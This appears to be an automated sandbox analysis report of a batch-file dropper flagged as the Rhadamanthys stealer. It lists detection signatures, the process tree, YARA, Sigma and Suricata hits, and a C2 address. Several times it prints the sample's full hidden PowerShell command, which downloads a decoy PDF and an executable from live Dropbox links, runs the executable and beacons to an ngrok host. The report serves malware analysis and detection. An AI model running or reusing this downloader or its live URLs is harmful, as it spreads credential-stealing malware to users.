Edit tour

Windows Analysis Report
122046760.bat

Overview

General Information

Sample name:	122046760.bat
Analysis ID:	1576698
MD5:	436f3ea86f14441069bcc1e311628357
SHA1:	8b8b465e85703f79d75170ab565aef8d45abf368
SHA256:	4bd2223d18e26d1705b9a8033160554a91455354746ebc6aa19970bfd21a95d6
Tags:	batCompilazioneprotetticopyrightuser-JAMESWT_MHT
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected RHADAMANTHYS Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Maps a DLL or memory area into another process

Powershell drops PE file

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (SLDT)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

JA3 SSL client fingerprint seen in connection with other malware

Launches processes in debugging mode, may be used to hinder debugging

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: PowerShell Web Download

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

cmd.exe (PID: 7504 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7552 cmdline: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }" MD5: 04029E121A0CFA5991749937DD22A1D9)

msedge.exe (PID: 7772 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8060 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2068,i,611884074151080472,7705597569893069782,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe (PID: 8308 cmdline: "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7)

bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe (PID: 5460 cmdline: "C:\Users\user\AppData\Local\Temp\bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe" MD5: 9BFDFAADE8C1612270DA2A69959756A7)

fontdrvhost.exe (PID: 932 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D)

fontdrvhost.exe (PID: 9172 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)

WerFault.exe (PID: 2936 cmdline: C:\Windows\system32\WerFault.exe -u -p 9172 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

WerFault.exe (PID: 7432 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5460 -s 444 MD5: C31336C1EFC2CCB44B4326EA793040F2)

svchost.exe (PID: 7912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

msedge.exe (PID: 8036 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate "C:\Users\user\AppData\Local\Temp\a0df86d4-9e44-49c4-ab97-66c1270d73b1.pdf" MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 2056 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8620 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --lang=en-GB --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6408 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:6 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8700 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6680 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8716 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6928 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

identity_helper.exe (PID: 9168 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)

identity_helper.exe (PID: 9196 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=7756 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8 MD5: 76C58E5BABFE4ACF0308AA646FC0F416)

msedge.exe (PID: 8980 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6720 --field-trial-handle=2012,i,10365238477831282436,1715506421362035403,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 9136 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 7432 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2196 --field-trial-handle=2176,i,8689619107775136306,13068804548118690571,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8176 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start /prefetch:5 MD5: 69222B8101B0601CC6663F8381E7E00F)

msedge.exe (PID: 8920 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1772 --field-trial-handle=2096,i,12285392887424033098,7395190095907951401,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.talosintelligence.com/highlighting-ta866-asylum-ambuscade/	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://104.161.43.18:2845/7e56fc199c7194d0/qc1o4gn8.mjfvk"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000018.00000003.2403887025.0000000003120000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000017.00000003.2394734471.0000000002E10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000018.00000003.2409389529.0000000005410000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000003.2409670656.0000000005630000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000018.00000002.2509453717.0000000003390000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000017.00000002.2413715867.0000000003180000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000017.00000003.2401851669.0000000005460000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000003.2402695142.0000000005680000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe PID: 5460	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: fontdrvhost.exe PID: 932	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
23.3.bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe.5680000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.fontdrvhost.exe.5630000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.fontdrvhost.exe.5410000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.fontdrvhost.exe.5630000.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
24.3.fontdrvhost.exe.5410000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
23.3.bd69d95c-d29d-4f14-a04a-6d3346ba93f6.exe.5460000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: PowerShell Web Download

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", ProcessId:

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", ProcessId:

Sigma detected: Usage Of Web Request Commands And Cmdlets

Source: Process started

Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", ProcessId:

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\122046760.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7504, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -wIndoWStYLe hiDdeN -NoProfile -Command "$RandomPDF = Join-Path -Path $env:TEMP -ChildPath ('{0}.pdf' -f ([guid]::NewGuid())); $RandomEXE = Join-Path -Path $env:TEMP -ChildPath ('{0}.exe' -f ([guid]::NewGuid())); Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/w47rcqepfnwm2w25ysbw7/Documents-about-company-information-and-job-descriptions-2.pdf?rlkey=yz6h1qih6tkldgdp6erbolsb5&dl=1' -OutFile $RandomPDF; Start-Process -FilePath 'msedge.exe' -ArgumentList '--kiosk', $RandomPDF; Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1' -OutFile $RandomEXE; Start-Process -FilePath $RandomEXE; if (Test-Path $RandomEXE) { Invoke-WebRequest -Uri 'https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/metadata/a53f93d43005d4ee2fadb95063c82fef'; }", ProcessId:

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7912, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T12:14:15.012654+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49732	162.125.69.18	443	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-17T12:15:19.411648+0100	2854802	1	Domain Observed Used for C2 Detected	104.161.43.18	2845	192.168.2.4	49828	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

